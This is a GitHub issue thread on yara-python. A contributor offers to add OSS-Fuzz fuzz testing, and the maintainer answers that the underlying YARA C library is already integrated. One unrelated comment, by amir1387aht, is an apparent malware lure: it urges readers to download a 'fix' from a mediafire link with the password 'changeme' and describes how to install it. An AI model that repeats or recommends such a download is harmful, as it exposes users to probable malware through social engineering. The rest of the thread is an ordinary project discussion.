### ISSUE TITLE
OSS-Fuzz Integration Inquiry

### ISSUE THREAD

**Issue by capuanob** [VirusTotal/yara-python#264]
Hello!

I have integrated a few open-sourced projects into OSS-Fuzz, a program sponsored by Google to provide continuous fuzz-testing of impactful open-sourced projects, and am wondering if yara-python's maintainers would approve me undertaking the work to develop a harness to fuzz-test this library and integrate it into OSS-Fuzz.

If you would like more details on what OSS-Fuzz is and what this work would entail, more details can be found [here](https://google.github.io/oss-fuzz/).

Thank you for your consideration and I look forward to working with you all!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by plusvic** [comment]
Hi @capuanob, YARA is already integrated into OSS-Fuzz, not `yara-python`, which is only the Python interface for YARA, but the underlying C library, which is the one that does the heavy lifting and can benefit from such integration.

See: https://github.com/google/oss-fuzz/tree/master/projects/yara
